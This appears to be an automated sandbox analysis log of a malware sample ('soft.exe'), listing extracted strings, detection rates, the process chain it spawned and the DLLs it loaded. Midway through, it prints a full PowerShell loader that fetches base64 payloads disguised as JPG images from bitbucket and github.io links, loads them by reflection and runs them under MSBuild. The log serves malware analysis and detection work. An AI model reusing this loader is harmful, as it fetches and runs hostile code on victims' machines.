Source: ssdtoolbox.exe, ssdtoolbox.exe, 0000000D.00000002.2547923338.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.13.dr, is-PEPS4.tmp.12.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: ssdtoolbox.exe, 0000000D.00000002.2547923338.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.13.dr, is-PEPS4.tmp.12.dr Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: ssdtoolbox.exe, 0000000D.00000002.2547923338.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.13.dr, is-PEPS4.tmp.12.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: ssdtoolbox.exe, 0000000D.00000002.2547923338.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.13.dr, is-PEPS4.tmp.12.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: ssdtoolbox.exe, 0000000D.00000002.2547923338.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.13.dr, is-PEPS4.tmp.12.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: ssdtoolbox.exe, 0000000D.00000002.2547923338.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.13.dr, is-PEPS4.tmp.12.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: ssdtoolbox.exe, 0000000D.00000002.2547923338.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.13.dr, is-PEPS4.tmp.12.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: ssdtoolbox.exe, 0000000D.00000002.2547923338.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.13.dr, is-PEPS4.tmp.12.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: ssdtoolbox.exe, 0000000D.00000002.2547923338.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.13.dr, is-PEPS4.tmp.12.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: ssdtoolbox.exe, ssdtoolbox.exe, 0000000D.00000002.2547923338.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.13.dr, is-PEPS4.tmp.12.dr Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: soft.exe Virustotal: Detection: 26%
Source: soft.exe ReversingLabs: Detection: 26%
Source: N7LnRW81Rfq.exe String found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
Source: soft.exe String found in binary or memory: net/addrselect.go
Source: soft.exe String found in binary or memory: github.com/saferwall/pe@v1.5.6/loadconfig.go
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown Process created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: unknown Process created: C:\Users\user\Desktop\soft.exe "C:\Users\user\Desktop\soft.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Source: C:\Users\user\Desktop\soft.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process created: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe "C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe"
Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe Process created: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp "C:\Users\user~1\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp" /SL5="$A0242,3545097,56832,C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe"
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Process created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe "C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe" -i
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process created: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exe "C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exe"
Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c 67c2163c9db39.vbs
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\67c2163c9db39.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = '…'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.gnrckkh/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: moshost.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mapsbtsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mosstorage.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mapconfiguration.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: aphostservice.dll
Source: C:\Windows\System32\svchost.exe Section loaded: networkhelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userdataplatformhelperutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mccspal.dll
Source: C:\Windows\System32\svchost.exe Section loaded: syncutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: syncutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vaultcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dmcfgutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dmcmnutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dmxmlhelputils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: inproclogger.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: windows.networking.connectivity.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: synccontroller.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pimstore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: aphostclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: accountaccessor.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: systemeventsbrokerclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userdatalanguageutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mccsengineshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cemapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userdatatypehelperutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: phoneutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: storsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: devobj.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fltlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bcd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: storageusage.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\soft.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\soft.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\soft.exe Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\soft.exe Section loaded: umpdc.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: w32time.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: logoncli.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: vmictimeprovider.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: msimg32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: textinputframework.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: coreuicomponents.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: shfolder.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: rstrtmgr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: msacm32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: winmmbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: winmmbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: textshaping.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: riched20.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: usp10.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: msls31.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: explorerframe.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: sfc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: sfc_os.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: sqlite3.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeSection loaded: cabinet.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeSection loaded: feclient.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeSection loaded: textinputframework.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeSection loaded: coreuicomponents.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeSection loaded: textshaping.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeSection loaded: advpack.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
